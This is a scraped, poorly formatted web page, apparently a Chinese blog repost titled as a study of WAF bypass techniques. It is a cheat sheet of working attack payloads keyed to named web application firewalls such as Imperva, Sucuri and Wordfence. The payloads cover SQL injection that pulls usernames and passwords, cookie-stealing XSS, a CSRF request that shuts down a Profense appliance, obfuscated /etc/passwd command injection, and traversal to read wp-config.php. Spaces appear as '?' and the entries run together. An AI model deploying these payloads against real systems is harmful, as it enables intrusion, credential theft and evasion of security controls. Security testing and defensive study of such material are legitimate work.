%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201SQLi Bypass?by?@Georgi Geshev?(v2.2)
1%0bAND(SELECT%0b1%20FROM%20mysql.x)SQLi Bypass?by?@SQLMap Devs?(v2.2)
%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29SQLi Bypass?by?@HackPlayers?(v2.2)
%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201Imperva
Imperva SecureSphere 13 - Remote Command Execution?by?@rsp3ar
XSS Bypass by?@David Y
<svg onload\r\n=$.globalEval("al"+"ert()");>XSS Bypass by?@Emad Shanab
<svg/onload=self[`aler`%2b`t`]`1`> anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldzXSS Bypass by?@WAFNinja
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3EXSS Bypass by?@i_bo0om
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';> <img/src=q?onerror='new Function`al\ert\`1\``'>XSS Bypass by?@c0d3g33k
<object?data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>SQLi Bypass by?@DRK1WI
15 and '1'=(SELECT?'1'?FROM?dual)?and?'0having'='0having'SQLi by?@Giuseppe D’Amore
stringindatasetchoosen%%' and 1 = any (select?1?from?SECURE.CONF_SECURE_MEMBERS?where?FULL_NAME?like?'%%dministrator'?and?rownum<=1?and?PASSWORD?like?'0%')?and?'1%%'='1Imperva SecureSphere <= v13 - Privilege Escalation?by?@0x09AL
Kona SiteDefender
HTML Injection?by?@sp1d3rs
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253EXSS Bypass?by?@Jonathan Bouman
<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"XSS Bypass?by?@zseano
?"></script><base%20c%3D=href%3Dhttps:\mysite>XSS Bypass by?@0xInfection
<abc/onmouseenter=confirm%60%60>XSS Bypass?by?@sp1d3rs
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253EXSS Bypass?by?@Frans Rosén
<style>@keyframes?a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>XSS Bypass?by?@Ishaq Mohammed
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>Profense
GET Type CSRF Attack?by?@Michael Brooks?(>= v.2.6.2)
Turn off Proface Machine
<img?src=https://host:2000/ajax.html?action=shutdown>Add a proxy
<img?src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>XSS Bypass by?@Michael Brooks?(>= v.2.6.2)
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>XSS Bypass?by?@EnableSecurity?(>= v2.4)
%3CEvil%20script%20goes%20here%3E=%0AByPass %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3EQuickDefense
XSS Bypass by?@WAFNinja
?<input?type="search"?onsearch="aler\u0074(1)"> <details?ontoggle=alert(1)>Sucuri
Smuggling RCE Payloads?by?@theMiddle
/???/??t+/???/??ss??Obfuscating RCE Payloads?by?@theMiddle
;+cat+/e'tc/pass'wd c\\a\\t+/et\\c/pas\\swdXSS Bypass?by?@Luka
"><input/onauxclick="[1].map(prompt)">XSS Bypass?by?@Brute Logic
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post> <input?type=hidden name=a?value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>"> <input?type=submit></form>URLScan
Directory Traversal?by?@ZeQ3uL?(<= v3.1) (Only on ASP.NET)
http://host.com/test.asp?file=.%./bla.txtWebARX
Cross Site Scripting by?@0xInfection
<a69/onauxclick=open()>rightclickhereWebKnight
Cross Site Scripting by?@WAFNinja
<isindex?action=j	a	vas	c	r	ipt:alert(1)?type=image> <marquee/onstart=confirm(2)> <details?ontoggle=alert(1)> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="alert(1)"> <img?src=x?onwheel=prompt(1)>SQLi by?@WAFNinja
0?union(select?1,username,password from(users)) 0?union(select?1,@@hostname,@@datadir)XSS Bypass by?@Aatif Khan?(v4.1)
<details?ontoggle=alert(1)> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="alert(1)">SQLi Bypass?by?@ZeQ3uL
10?a%nd?1=0/(se%lect top?1?ta%ble_name fr%om?info%rmation_schema.tables)Wordfence
XSS Bypass by?@brute Logic
<a?href=javascript:alert(1)>XSS Bypass by?@0xInfection
<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>clickHTML Injection?by?@Voxel
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpXSS Exploit?by?@MustLive?(>= v3.3.5)
<html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body?onLoad="document.hack.submit()"> <form?name="hack"?action="http://site/?_wfsf=unlockEmail"?method="post"> <input?type="hidden"?name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html>Other XSS Bypasses
<meter onmouseover="alert(1)" '">><div><meter onmouseover="alert(1)"</div>" >><marquee loop=1 width=0 onfinish=alert(1)>Apache Generic
Writing method type in lowercase by?@i_bo0om
get?/login HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0?(compatible; MSIE5.01; Windows NT)IIS Generic
Tabs before method by?@i_bo0om
GET?/login.php?HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)?
總結
以上是生活随笔為你收集整理的干货|各种WAF绕过手法学习的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 关于站库分离渗透思路总结
- 下一篇: 干货|代码安全审计权威指南(附下载地址)